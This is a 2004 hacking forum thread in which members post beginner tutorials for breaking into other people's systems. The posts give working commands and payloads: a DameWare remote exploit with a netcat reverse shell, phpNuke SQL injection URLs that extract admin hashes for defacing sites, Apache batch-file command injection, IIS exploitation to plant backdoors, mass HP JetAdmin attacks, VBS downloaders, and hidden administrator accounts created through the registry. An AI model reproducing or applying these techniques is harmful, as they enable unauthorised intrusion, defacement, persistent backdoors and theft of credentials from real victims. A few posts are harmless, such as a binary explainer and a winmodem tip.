Maybe you're just starting out and new to hacking & security.How about writing a mini tutorial every time you learn something new. This will help you consolidate your understanding and enable you to teach new members something so we all learn.
Look forward to reading them.
Train25
Feb 3 2004, 12:26 AM
I would have to agree. This would spread the knowledge and cover all members from the novice to advanced user.
Maybe something for the admins and mods to discuss??
sweetangel_4u62
Feb 5 2004, 12:07 AM
Hi... Im new to all this... i would like to know where i could get a good "port listener" (in my b-f's words) So i can see if someone is hacking me i guess....
w00dy
Feb 5 2004, 01:26 AM
CODE
netstat -ao
a = listens to all posts o = shows the PID so u know what app it is taht is listening to that port. PS why are u posting this to this thread?
You must be active in the forum and make some good posts then you'll be promoted.
forza
Feb 16 2004, 07:21 PM
Tutorial for beginners: DameWare Mini Remote Control v3.72 & v3.73 remote exploit
Tools: * NetCat * Autototof_dameware_3.72_3.73.rar (http://www.kyoshi.nl/files/autototof_dameware_3.72_3.73.rar) * TFTP server
Open command prompt, go to the folder with nc.exe now give the follow command: nc -L -vv -p <port>
For example: C:\>nc -L -vv -p 4567 listening on [any] 4567 ...
Netcat is now listening and waiting to be changed in a reverse command line.
Go to your autototof_dameware_3.72_3.73 directory and start damwre.bat. (you can scan and hack) Here I wanna hack a dmware 3.73 machine so I choose 6. Enter ip (hacked ip) 1**.1**.*.5 give me your ip 1**.1**.*.* give me your port 4567 <port used in netcat> give me variant winXP(0,1,2) 0
If all goes well, you get this screen:
[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt] www.coromputer.net && undernet #coromputer
[+] Connecting to ***.***.*.5 ...Done [+] Gathering information ...Done [i] Operating system : Win2000 [i] Service Pack : 4 [+] Setting shellc0de for this version ...Done [+] Sending evil packet ...Patched
Now you get in Netcat a prompt for the remote machine C:\windows\system32>
Now you can start moving files to the remote machine with tftp tftp.exe -i YOURIP get FILE c:\Winnt\system32\FILE And starting backdoor services or ...
Make your admin account net user USERNAME PASSWORD /add net localgroup administrators USERNAME /add
Enjoy Your Hack!
EDITED No IP address should be posted. Thanks
Qlimax
Feb 17 2004, 04:14 PM
hello ha everybody (: there is a tut' for how using echo. i don't know evreything about echo but i know: if u want to use echo u need FTP.EXE file on the box u try to hack. ok we start: first u need to open server on ur box. open new folder (whatever u want on which drive u want) and put there the files u want to upload. open user with ur server app and and home dired the user on the folder u open. now go to the cmd\shell\whatever u have and wirte the commands:
after u wirte the command's u see the remote box starting to download from u box after its finshed u can do whatever u want. i hope i help u Qlimax.
mrmoose²
Feb 17 2004, 10:42 PM
I Have a question how can I scan Anon pubs like Grims ping but with SuperScanner 4.00 ? can someone help ?
DiabloPatch
Feb 18 2004, 04:52 PM
A nice site with some tuts I made (DiabloHorn) and also tut's from some other peeps. and a few tools hope you peeps enjoy
hxxp://www.woodys-software.tk
Availible tut's on the site:
Escalating privileges on Windows 2000 & XP Escalating privileges on Windows 2000 How to hack IIS 5.0 through WebDAV Netbios hacking Gathering info on remote host The Road To Becoming A Hacker Many ways to obtain an IP Serv-U Error 100 Hacking Secured SQL File Transfer Methods SQL: Problems and Solutions Hacking msadc (NT IIS MDAC RDS Vulnerability) Hacking Basics Part 1 Hacking Basics Part 2 Hacking Basics Part 3 Hacking Basics Part 4 Hacking Basics Part 5
Todd
Feb 22 2004, 08:20 AM
when i do the DMW sometimes i cant get the hack(win98) so a friend of mine told me to make a slave.exe for a remote proggy i echo get that to the site to and install it that way i got another access to the site to work from thats usaly solve my prob
just thourgh i would share that :-)
whiskah
Mar 5 2004, 03:24 AM
Defacing phpNUke sites Using Multiple SQL INJECTION TECHNIQUES Although this is very old, I was surprised to see thousands of sites vulnerable even security sites and some hacking sites using phpNUke..
TOOLS: 1. Google,Browser 2. MD5 password cracker Cain and Abel Lepton's Crack Rainbowcrack mdcrack 3. Wordlist
STEPS:
1. Google search strings:this are just examples(this is just how I did), use your imagination.. allinurl:/modules.php?name=Downloads allinurl:/modules.php?name=Web_links allinurl:/modules.php?name=Sections allinurl:/modules.php?name=Reviews 2. goto site then copy paste the strings that starts with '&' so the query for downloads module sample would be hxxp://phpnukesite/modules.php?name=Downloads&d_op=viewdownload&cid=2 UNION select counter,aid,pwd from nuke_authors--
weblinks module sample would be hxxp://phpnukesite/modules.php?name=Web_links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*
Sections module sample would be hxxp://phpnukesite/modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors
Reviews module sample would be hxxp://phpnukesite/modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*
3. If you cracked the admin hash then login thru http://phpnukesite/admin.php 4. Respect and don't damage too much, Just inform them to patch 6. You will be amazed how many sites you can deface 7. Some alternative queries are listed below:
[DOWNLOADS MODULE] --admin,hash--- &d_op=viewdownload&cid=2 UNION select counter,aid,pwd from nuke_authors--
&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*Defacing phpNUke sites Using Multiple SQL INJECTION TECHNIQUES Although this is very old, I was surprised to see thousands of sites vulnerable even security sites and some hacking sites using phpNUke..
TOOLS: 1. Google,Browser 2. MD5 password cracker Cain and Abel Lepton's Crack Rainbowcrack mdcrack 3. Wordlist
4. Respect and don't damage too much, Just inform them to patch 6. You will be amazed how many sites you can deface
I hope everyone lets the admin know and not defaces the web site
rockerx
Mar 5 2004, 09:59 PM
Hi, i wrote this today. The english translation is just for this board
E n g l i s h
What do we want? -We wan't to set up a very simple webserver on the rooted server.
What do we need? - hiderun.exe - miniwebserver.exe (u better rename it) - miniwebserver.ini - some html files (optional)
Ok, first we create the ini file open your favourite editor and type the following text and save it as miniwebserver.ini
Port=13373 Root=C:\ Listing=1
"Port" is selfexplaining "Root" is the directory where the server looks for he htmlfiles (needs to exist) "LIsting": shows directory listing if html files are missing. options 0 (disabled) 1 (enabled)
ok, now upload the files to the server into one and the same directory and execute the server using: hiderun miniwebserver.exe cfg=miniwebserver.ini
Now it's done! The server is up!
note: after a reboot the webserver will not start up automatically but you know how to solve this problem
rockerx
D e u t s c h
Was beschreibt diese txt? - Wie wir einen kleinen simplen webserver auf nem gehaxten server aufsetzen
Was brauchen wir dafür? - hiderun.exe - miniwebserver.exe (besser umbenennen) - miniwebserver.ini - html dateien (optional)
Ok, zuerst schreiben wir die ini datei tippe in deinem editor folgende zeilen ein und speichere sie als miniwebserver.ini ab
Port=13373 Root=C:\ Listing=1
"Port" erklärt sich von selbst "Root" ist das verzeichnis wo der server die html dateien erwartet "Listing": Zeigt den verzeichnisinhalt an wenn keine index.html vorhanden ist options 0 (disabled) 1 (enabled)
Gut, jetzt lade die dateien auf den server in ein verzeichnis hoch und starte den webserver wie folgt hiderun miniwebserver.exe cfg=miniwebserver.ini
ok, jetzt läuft der server.
nach nem reboot wird der webserver nicht automatisch mit gestartet aber wie ihr das bewerkstelligen könnt wisst ihr ja
rockerx
rotem
Mar 19 2004, 02:09 PM
cab someone explain me something about the MyDoom ? please tell me what tools i need and how do i send the packet to the host ?
JohnAcres
Mar 20 2004, 06:33 PM
Hacking WebDav
I'm going to do this tutorial like a science lab because I like that format. I haven't really read around that much so I'm not sure if this has been posted before or not or if this is even needed.
Purpose: Get a shell on the host.
Tools/Materials: wb.exe (the WebDav exploit by kralor, www.coromputer.net) nc.exe (netcat)
Procedure: 1. Open up netcat, nc -L -vv -p 1434 2. Make a batfile for wb.exe to get all the paddings in order to make easier.
Thats about it... not hard, not complicated, or really new but I thought it might help someone out.
tweakz20
Mar 21 2004, 11:16 PM
people. this is for tutorials... not requesting tutorials...
some of these are nice for new tallent, good job guys about the one using echo... you can just use notepad or any wordprocessor to make life way easier... but if you're in dos or constructing a batch file, that's a very usefull command.....
NeBoKaDnEzZaR
Mar 25 2004, 08:25 AM
Hei Thx a lot for the Web Server Turtorial. A really good idea to make it in 2 langauges resoect. I also will make TUT'S here wehn i learned some new. Was a good idea.
Greez NeBo
TwitcH
Mar 25 2004, 10:06 AM
This tut is just a lil something im still working on, hope this helps.
Gathering Information On Your Target V1.6 An Unsecure Team Tutorial
-ContentS- 1: Gathering Basic Information on The Administrator 2: Gaining Your Targets IP Address 3: Finding out the Targets Operating System Type and The Services it is Running 4: Port Scanners Will Help You Uncover Those Holes... 4: Finding Exploits for these Services
ChapteR 1: Gathering Basic Information On the Administrator
Gathering information on the person that runs your target system might seem a bit silly but belive me it can help a damn lot when trying to gain access to the system. One example of this is cracking passwords ie: Your trying to use a dictionary attack on his password hash using an english dictionary when in fact he is actually japanese and so is his password, or another reason this can be very useful is that social engineers can get to know his/her habits/hobbies/interests and work there way into the system by tricking people he works with into giving you access. We'll start by visiting the admins website, take note of the topic of the website this can be a very big clue as to what the admin is interested in (and you could also find other less secure sites he might have a username and password on to try and get his password which might also be the password to his e-mail/server). Also try and grab his e-mail address (even his e-mail addy's name could be a big clue as to what his password is). You can even try slapping his e-mail addy into msn and try to talk to him pretending to be someone he knows or someone interested in what his server is running (just try not to sound too suspicious). Once you know as much as you can about the admin try doing a finger or whois on his website/e-mail (these tools are explained in the mini-tutorials sections on the unsecure site) I think thats about all you can do to find out about the admin (just remember exploiting/cracking isnt the only way into a server).
ChapteR 2: Gaining Your Targets IP Address
This is a very important but relatively easy part of gathering information on the target. You will need the targets IP address to use tools such as Port Scanners, Exploits, Sniffers blablabla... Getting it as i said earlier is a piece of piss, one easy way of doing this is nslookup just go to your commandline and type nslookup "inserthostname here" <(Without The Quotes!!) this should hopefully bring up the hosts IP addy. BUT! this might not be the way into the server you might need to hack the admins personal computer so you will need the admins personal computers IP addy, getting this can be a bit harder. I cant think of any definate way of doing this but there are some tools that you can download that will let you get the IP Address using MSN, ICQ and other programs that use a connection between the two computers.
Chapter 3: Port Scanners Will Help You Uncover Those Holes...
There are lots of different port scanners available for you today, some have millions of options others just do a simple TCP scan. This chapter will just tell you a little about the best ones available and where to get them from.
Nmap: Nmap can be found at http://www.insecure.org and is a linux based port scanner (although there is a windows port i dont reccomend it due to really slow scanning times). Nmaps best feature is its amount of scanning options, some of these are: * Vanilla TCP connect() scanning, * TCP SYN (half open) scanning, * TCP FIN (stealth) scanning, * TCP ftp proxy (bounce attack) scanning, * SYN/FIN scanning using IP fragments (bypasses packet filters), * UDP recvfrom() scanning, * UDP raw ICMP port unreachable scanning, * ICMP scanning (ping-sweep), and * Reverse-ident scanning. * OS Detection
as you can see thats quite a list and very very useful in any hackers eyes .
GFI LanGuard Network Security Scanner: http://www.gfi.com This is a windows based scanner with a nice easy to use gui, this scanner will not only detect OS version, scan the ports and do port range scans, it also looks to see if the target has any security holes!! This lil bugger will scan there computer using the latest exploits/trojan ports and tell you if the target computer is exploitable. This can help a damn lot when gathering information on a target. Once the scanner has found an exploit, it will show you a link to the BugTraq listing for this exploit where you can possibly find out how to exploit this hole.
NetScan Tools Pro 2000: http://www.nwpsw.com This is a simpler version of a windows GUI based port scanner, but this one has a shitload more options, things like finger, ping, traceroute, WhoIs, SMTP E-mail generator, NetBios Info Lookup and about 10 more... Only thing is this one is not free, you have to pay for it. (although i do think i saw this floating around DC++ )
ChapteR 4: Finding Exploits For The Services
This part is simple, everyone no matter how dumb should be able to find an exploit just try and find out the version of the service you want to exploit open up google and search for "blabla 1.0 exploit" or summin along those lines. Find the exploits compile, read the instructions and attack. Ill write up another tutorial on using some common exploits one day. (just vote for the tutorial you want at unsecure.khgamez.com) Well that just about wraps it up for Version 1 of this tutorial (yes i said version one this thing will get updated and will go into the extreme details of everything ive mentioned in here) so while your waiting for more fuller explanations and techniques for gathering information on your target server head over to unsecure.khgamez.com and fill them boards, post some tutorials and submit some news. Another way of finding new exploits is to sign yourself up to an exploit mailing list, these can be very helpful on difficult hacks because new exploits are appearing
Anyone wanting to be a part of the unsecure.khgamez.com team should send me an e-mail at illuminati_2600@hotmail.com thank you and happy hacking
migo
Mar 31 2004, 10:23 PM
wow!
binary_hashes
Apr 1 2004, 03:37 AM
hi, all i m also a new i want to know the difference between MS03-026 AND MS03-036 Vulneribility pLeAse i need some guidance
eXtiGy
Apr 3 2004, 11:15 AM
QUOTE
MD5 password cracker
Hello all, regarding this MD5 cracker, i always stuck at "password size 6 scanning" for a very very long time, like, 2 hrs or more, didnt continue cracking after 2 hours+. what is the problem? anyone knows? or is the hash is impossible to crack at all?
this is the hash by the way.. : 48b63ee26e7e0f115bfc627cd9b6c725
Jay
Apr 3 2004, 11:24 AM
eXtiGy. This looks like you are doing illegal things and then posting the hash in the main forum asking for help.This is a security forum and not a script kiddy forum.
Member suspended.
Cyberneo
Apr 16 2004, 03:06 AM
QUOTE (rotem @ Mar 19 2004, 02:09 PM)
cab someone explain me something about the MyDoom ? please tell me what tools i need and how do i send the packet to the host ?
Hello, this is my first post arround here and hopefully there will be a lot more soon. Well my doom its not that big of a deal to get to, all u need to use MyDoom is a port scanner, the rsCRT.exe, a telnet prog like nc.exe and the prog to exploit the vuln itself called mykralor.exe.
1- so, first thing is first, u need to get the range u want to check for the doom vuln scanned, for wich we´ll use the port scanner, and set it to scann on port 3127.
2- After u get a list of results from the scann u open the rsCRT.exe; wich will create us a remote shell that we can uplaod to the place ur testing for security issues. So just set the Ip and port u want this program to Bind the shell to and hit the create button.
3- Now we need to prepare to get a shell. Open nc.exe and set it to listen to any (nc.exe -l -vv -p PORT#) It will wait for an incomming connection from the place u uploaded the program created with rsCRT.exe to give you a shell.
4- Open mykralor.exe and with your results from the scan and run it like this. ie. mykralor.exe Target_IP 3127 shell.exe *note* shell.exe should be in the same directory as mykralor.exe This will start sending the packet to the provided hosts and if the host is infected u´ll get a prompt dropped in ur nc.exe listening window.
To secure any site u find with this vuln u just need to upload a file called securemydoom.com and get in a cmd prompt and type securemydoom.com -NOC with that, the program will start an autosearch in the site for infected files and will erase em from it and ur box will be cleaned fro this nasty virus.
If u need this cleaner file just lemme know. I can send it anywere or post it here. Hope this helps u and any1 else that needs ingo in MyDoom virus.
pink.frog
Apr 16 2004, 07:09 PM
Thanks for the MyDoom Tut. Great piece of work
TheRealGiant
Apr 17 2004, 11:20 AM
Not new, but might help someone.
Apache Win32 - 1.3.23 & 2.0.28 Hacking
What you need : +++++++++++++++
You don't need any tool to make the deface. This vulnerability can be exploited via a browser.
1.This vulnerability has been exploited on - Apache 1.3.23 - Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat file which enables this attack)
When a request for a DOS batch file (.bat or.cmd) is sent to an Apache web server, the server will spawn a shell interpreter (cmd.exe by default) and will run the script with the parameters sent to it by the user. Because no proper validation is done on the input, it is possible to send a pipe character ('|') with commands appended to it as parameters to the CGI script, and the shell interpreter will execute them.
2.Find a webserver running Apache 1.3.23(Win) or Apache 2.0.28-BETA(Win)
(a)To view the httpd.conf file residing in the /conf directory of the Apache installation, you must copy it into the virtual web root.
hxxp://www.target.com/cgi-bin/test-cgi.bat?|echo+Defaced bY YOU+>>+..\htdocs\index.html
This will append the string "Defaced bY YOU" to the index.html file residing in the virtual web root directory.
Thats how this vulnerability can be exploited...
seeno
Apr 29 2004, 10:14 PM
For thoes who can't use there winmodems (Conexant chipsets). did you install a Linux distro and found out you couldn't use your winmodem? well, there's a solution for that now, go to Linuxant and download the right package for your kernel/modem (free version), install it and give it a try using kppp. kppp is a GUI version for thoes who want to connect quick and/or don't know how to configure pppd, your limited to 14.4Kbps data with the free version so i would recomend you to buy the full version.
Spawn
May 2 2004, 03:10 PM
You can Download a lot of programming tuts here : Take a look, its a nice one
alright im gonna do a quick tutorial on how to hack and scan for hp web jetadmin.. the ways of my knowledge and experience if anyone has any suggestions feel free to post em cause right now the scanning/checking is fairly crude.
alright well ill start off with the scanning for HP Web JetAdmin. Sfind or scan500 whichever ur favorite scanner of that type is and choose a range and scan for port 8000... fairly simple right... so if u were using sfind ud do...
sfind 127.0.0.1 127.254.254.254 -p 8000
once u have that scan take scanline or whatever other banner scanner u want to use and banner scan the ips on port 8000, for scanline it goes like this
sl -bhpt 8000 -f portscan.txt -o bannerscan.txt
now you have the banner results... you want to find all the banners that have HP Web JetAdmin in them and copy all the ips to another txt file. once you have this txt file we can use notepad to (hopefully u didn't scan multiple A class ranges or this trick is kinda hard) turn these ips into sort of a masshacker/autohacker. Go to replace put in the first number set in the range (example if i scanned 127.9.0.1 to 127.60.254.254 id put in 127.) with the period at the end in the find dialog box... in the replace box put hp.pl plus the first number set with the peroid... so example ( i put 127. in the find dialog i put hp.pl 127. in the replace with dialog box).
save and close the file... rename it to a .bat execute it in the folder with the exploit
it will go thru all the ips and try to hack em... once it gets to a windows box that it can hack it will ask you how u want to upload the files f for ftp or t tftp... chose ur prefence ive always done ftp cause i can't host a tftp server. itll ask you for the username/password for the ftp or tftp server. the ip, the file path, and the file you want uploaded... fill out all these with what you want... for the backdoor on this i HIGHLY recommend using a reverse connect shell because its not executed right away. open up ur netcat on the port that the victim is gonna connect back to and just wait for a while, theres no set time itll connect back to so just leave it open for a day or two.
easy as that... now for the more technical details about the exploit
the exploit is in perl so you can download activeperl its on the bottom of the perl2exe site i think but its fairly availble and just use the perl script which is much more stable and much faster.
note: i haven't read this over so sorry for the poory writing thats prolly in here... ill look it over eventually
tweakz20
May 8 2004, 01:09 AM
even though i'm in the speciallist category now, this tut isn't suppost to be too grand... most everyone knows about it.. understanding BINARY!
Binary is the lowest level, it is a bunch of switches of ON and OFF and computers show this with 1 (on) and 0 (off) now, for a while i had no clue what they were talking about with powers of ten crap, so here's a different way to look at it.
Here's a number- 192 (which is an example of an IP 8 Binary section) in Binary- 11000000 Let's explain this. 1- 0 2- 0 4- 0 8- 0 16- 0 32- 0 64- 1 128- 1 ( 128 + 64 = 192 )
OK, so what can you see from that table thing?
In Binary, the highest bit is on the left, the lowest on the right.
The number's starting number is ONE
The numbers DOUBLE each time they give another diget
No number can be made 2 different ways
to elaborate on the last thing in the list- imagine the number... 2... OK? (let's not make this more complicated than it is).. well how would you do two when the only two numbers <= 2 are 1 and 2? you can't use 2 ones, you have to use one two.. simple if you think about it
Binary is a very simple concept, once you get to understand it... if you're just starting out learning binary, hope this helped you
Borgon
May 18 2004, 05:04 AM
Hi,
Can someone include more sql injection tutorials? I have been doing some research on this topic and all i find are a few papers on exploiting easy login.asp form vulnerabilities, but nothing like a real application blindly, and not knowing the database table structures etc.
thanks
manu
May 18 2004, 08:08 AM
QUOTE
You can Download a lot of programming tuts here : Take a look, its a nice one
Unfortunately I didnt get any Tuts from that PAGE u mentioned. Waste of time.
Manu
Opal
May 23 2004, 11:26 PM
Vulnerability in Apache for Win32 batch file processing - Remote command execution
=> Vendor: Apache group
=> Product: Apache web server (Win32) - Running DOS batch files Tested on: - Apache 1.3.23 - Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat file which enables this attack)
=> Severity: High, remote command execution and arbitrary file viewing.
=> Summary: Because of a the way Apache web server handles DOS batch scripts it is possible to execute remote commands on the web server by using the pipe ('|') character.
** IMPORTANT ** The Apache 2.0.x installation is shipped with the default script /cgi-bin/test-cgi.bat which can be exploited, but it should be noted that ANY '.bat' or '.cmd' script will allow exploitation of this vulnerability.
=> Description: When a request for a DOS batch file (.bat or .cmd) is sent to an Apache web server, the server will spawn a shell interpreter (cmd.exe by default) and will run the script with the parameters sent to it by the user. Because no proper validation is done on the input, it is possible to send a pipe character ('|') with commands appended to it as parameters to the CGI script, and the shell interpreter will execute them.
----------------------------------------------------------------------------- 1.This vulnerability has been exploited on - Apache 1.3.23 - Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat file which enables this attack)
When a request for a DOS batch file (.bat or.cmd) is sent to an Apache web server, the server will spawn a shell interpreter (cmd.exe by default) and will run the script with the parameters sent to it by the user. Because no proper validation is done on the input, it is possible to send a pipe character ('|') with commands appended to it as parameters to the CGI script, and the shell interpreter will execute them.
2.Find a webserver running Apache 1.3.23(Win) or Apache 2.0.28-BETA(Win)
(a)To view the httpd.conf file residing in the /conf directory of the Apache installation, you must copy it into the virtual web root.
This will append the string "Defaced bY YOU" to the index.html file residing in the virtual web root directory.
Thats how this vulnerability can be exploited...
ShouiZen
May 25 2004, 03:51 PM
Yes it's good software the autotof_dameware_3.72_3.73 yeah man it's good job
Opal
Jun 1 2004, 09:23 AM
The How-To Hack IIS Servers For Pubstros Tutorial about Hacking using IIS exploits This one goes for the people that ask for a tut to start hacking. if u wanna know more research yourself
Pub Hacking Tutorial
The How-To Hack IIS Servers For Pubstros (By GENERAL NEWBIE) March 20 ,2002
or Educational Use Only##############################################
#####
Getting Started is simple... let me warn you that what your doing is illegal and dangerous. Now then This tutorial tells you how to hack IIS servers and make them as a pub... and how to rehack someone elses pub hahahahaha!
Now then the tools and knowledge you will need are as follows
Tools Required:
1. Serv-u Ftp Server 4.0 works just fine but versions 3.0 doesnt require an additional dll file 2. TFTPSuitePro2000 (h**p://www.walusoft.co.uk/software/tftppro.exe) 3. Your Brain with knowledge of the IIS Unicode Exploit or MSDAC Exploit 4. Internet Explorer 5. Other things to try
Ok Let Me Start By Saying This Is For "Education Purpouses" Only And I Take No Responsibility For What You Do
The Setup
Step 1: Install Serv-u AND download the already preconfigured ServuDaemon from me (recommended as i will be explaining from this)
The reason why i told you to download both is because the Servu Version 4 that you download has a admin program so you can make your own ini file after you understand everything i have in mine.
TFTPSuitePro Setup Open TFTPSuitePro, When It Asks U To Register Hit Register Than Cancel.You Should Have Sumtin That Looks Like This Hit System->Setup For Inbound Path File, Hit Browse And Pick The C:\FTP dir We Made, And Do The Same For Outbound Then Hit Ok. Now then when its time to upload files TFTP SERVER MUST BE RUNNING
Step 3: Unzip the Zip/Rar where you will find some goodies to help you scan for IIS servers and find one to hack
Here you will find tons of little programs that will assist you in hacking your server.
Step 4: FIND A VERNURABLE SERVER
Step 5: Start Making the Pub
Ok im assuming you have a host that you can maybe get away with uploading files to.. and i say this because some networks are behind firewalls that dont allow TFTP to connect to outside host and estabish a connection. Thus even though you can use the unicode exploit on it to view all the files still doesnt mean you can upload files to it.. PLus some host administrators make it so that you cant write to the HD... GOOD LUCk THERE
Starting To THE HACK
FIRST BEFORE YOU DO THIS BE SURE TO USE A PROXY !!!!!!!!!!!!!!!!
The Right Side, You Should Be At A Directory Listing In Internet Explorer.The Dir Should Look Like This :
h**p://xxx.xxx.xxx.xx/scripts/..%%3...32/cmd.exe?/c+d ir+c:\ <----- This line will vary
Ok you get the idea of what your browser looks like because your experienced but you are clueless about this pub crap Now then you will need to start and run TFTP SERVER making sure you arent running and firewall because it will block your request.Now we will need to send the files through the TFTP Server to the host. And to do this you do something like
Now then you arent limited to just 1 dir to install this server to.. i like to hide mine in the c:\winnt\system but some people use the c:\intepub\scripts
So then you would copy the above line into the Internet Explorer And Hit Enter, Look At Your TFTPSuitePro Window And u Should See Its Uploading A File. NOTE SOMETIMES you get an error msg just refresh the page or..copy into another window and try again remember sometimes you get this msg because the host cant connect properly to you..
Repeat for the following files:
SFIND.exe -------> used to scan for more.. servers KILL.EXE -------> used to kill a task very handy TLIST.EXE -------> used to list all running processes or Task List ncx99.exe -------> used to have as a backdoor remote trojan that runs on port 99 iis-scanner.EXE great for scanning servers servudaemon.ini needed for servu
fxp crap i hate it anyway i think everybody in here knows about iis hacking...
Apok^
Jun 2 2004, 01:58 PM
K, it has been a while, but I can remember this
some fun stuff to do in a lab:
shutdown -s -m \\[computer] (shuts down computer)
shutdown -a -m \\[computer] (aborts shutdown)
open a .txt file
type in this EXACTLY ---------------------- :a net send [username....blabla, type net send /? for more] "message" goto a
---------------------- rename the file to a .bat instead of .txt it will net send them to death
globey
Jun 8 2004, 10:06 PM
by diablohorn
******************************************************************************** ** *Tutorial on getting the stuff on a stro when the machine has got no TFTP or FTP.* *Tutorial Written By: DiabloHorn * *Comment: This is intended mostly for rehacking, sometimes for hacking new ones * *Creditz: Kimatrix,www.google.com * *COMMENT: This is mostly intended to only download wget.exe with it dont try to * *download big things like serv-u * ******************************************************************************** **
Index
0) Opening Words 1) The Netcat Way 2) .vbs script 3) Greetz
******************************************************************************** ************************** * 0) Opening Words * ******************************************************************************** ************************** Hmm what shall I say this time? O yeah I'm trying to improve my english hope you will read tut's of mine with perfect english on it pretty impossible but I'll try. Well about the tutorial you are about to read, this tutorial is ment for when you are on a machine you've got a shell but when typing the command tftp or ftp to get the files on it , it returns:
"ftp" Command not recognized or some similar error.
if that error sounds familiar then this tutorial might be for you. I say might because if telnet is also deactivated then well to bad. Hope you all still awake so read on and get started.
******************************************************************************** ************************** * 1) The Netcat Way * ******************************************************************************** ************************** Sub-Index
1) Purpose 2) Tools Needed 3) HowTo
1) Purpose
Using 2 netcat's to retrieve a file
2) Tools Needed
- a Shell - 2 Netcat's - File 2 Transfer
3) HowTo
Fire up netcat on your machine like this:
nc.exe -l -p 4455 -u -vvv < file.exe
When done fire up netcat on the hacked machine like this:
nc.exe -u host port > outputfile.exe
When this is done therewill be a connection but nothing will be sent until you send a charachter from own machine to the hacked one so just type something "a" would be enough and hit enter. Now the stupid part with this you have no idea how long it will take so I suggest you DON'T transfer serv-u with this, but rather a thing like wget.exe and then just download the stuff from the web. This is tested locally and remote with normal acces to the shell so just tweak it until it works for you.
this is ment to make a .vbs executable script that downloads a file from the web. similar to wget but doesn't need to be uploaded also works when tftp and ftp and net commands are disabled.
2) Tools Needed
- a Shell - a commandline editor - if no commandline editor availible the ""echo" command
3) HowTo
first of all make shure any anti-virus is disabled because a .vbs file sometimes get caught by antivirus programs.
First I'll discuss the commandline editor option then I'll discuss the echo option
//////////////////////////////////////////////////////////////////////////// HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False / / Change that to the place where you're OWN .exe file is located / / SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite / / Change that to the name of the .exe file you want to have and it's location/ ////////////////////////////////////////////////////////////////////////////
When done typing the above just save the file by pressing CTRL+Z when the file is saved just execute it like a normal .exe and wait till the file is downloaded.
//////////////////////////////////////////////////////////////////////////// HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False / / Change that to the place where you're OWN .exe file is located / / SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite / / Change that to the name of the .exe file you want to have and it's location/ ////////////////////////////////////////////////////////////////////////////
When done just execute like normal .exe and wait till the file is downloaded.
To the wonderfull world of internet and Kimatrix for helping me on testing the netcat things.
Hack it all just don't break it all.
Also want to say thx to all the peeps on NFE who gave me a nice place to learn in a quick way new things and help other peeps out with my knowlegde.
wambari
Jun 30 2004, 11:28 AM
Bypass school web content filter:
Most of these run on the school proxy server,here's how to bypass,result,unlimited and unrestricted internet access,multimedia download,.exe's etc.
Step1: -Collect External Ip address of school's DNS server (nothing a little social engineering can't solve). -Get the internal ip address of school proxy server (you can get this from the internet connection settings of your browser under proxy servers).
Step2: -Get admin priviledges on client (need this to change ip settings on machine)
Step3: -Edit the TCP/IP connection gateway of your LAN by getting into the advanced option and adding a default gateway,set this to the ip address of the proxy server obtained in step1 above.
Step4: -Under TCP/IP Properties again,set the Preffered DNS server to the external DNS ip obtained in Step1.
Step5: -Remove the proxy settings on the browser by selecting the 'directly connected to internet' option.
Step6: -Fire up the browser and surf!
Enjoy.
wambari
IcedOut3E
Sep 4 2004, 04:03 AM
Maybe just a quick addition to the bypassing school filter.
Depending on how good the schools proxy is, you can usually just use a free proxy based anonymous browsing site for any websites that block you out.
I know I did it when I was in school
My school used "Bess" proxy server.
Vort3x
Sep 4 2004, 08:44 PM
This topic serves as a reference to Web multimedia programs.
for those of you out there using the net user /add <user> <pass> thing to add accounts to xp machines (i say xp as ive only tested it on xp) this may help you some what there is a reg key located at:
if you add youre newley created account as a dword with a value of 0 it hides the account
example:
net user /add <user> <pass> net localgroup /add Administrators <user> echo REGEDIT4 >> user.reg echo echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts] >> user.reg echo echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> user.reg echo "<user>"=dword:00000000 >> user.reg echo regedit /s user.reg del user.reg
would add a user <user> with the password <pass> to the system with admin rights it would also hide the user from the user accounts manger
only tetsed on windows xp home/pro sp0/sp1/sp2 im sure it would work for w2k and w2k3 though
this is my first post so please exuse any errors etc
[N0N4M3]
Oct 22 2004, 06:16 PM
I love this !!! Greetz for all and big smack Cordially NoName
Toasty
Nov 9 2004, 03:44 AM
Hey all, forgive my n00bishness with all of this. (I've managed to get a few SQL injections made up but thats about as far as I go)
I've got 2 mates that I REALLY REALLY want to prank. They're both using phpnuke 7.4 and phpbb 2.0.6.
I've found these script things which seem to be really common, but I have no idea what to do with them . . .
QUOTE
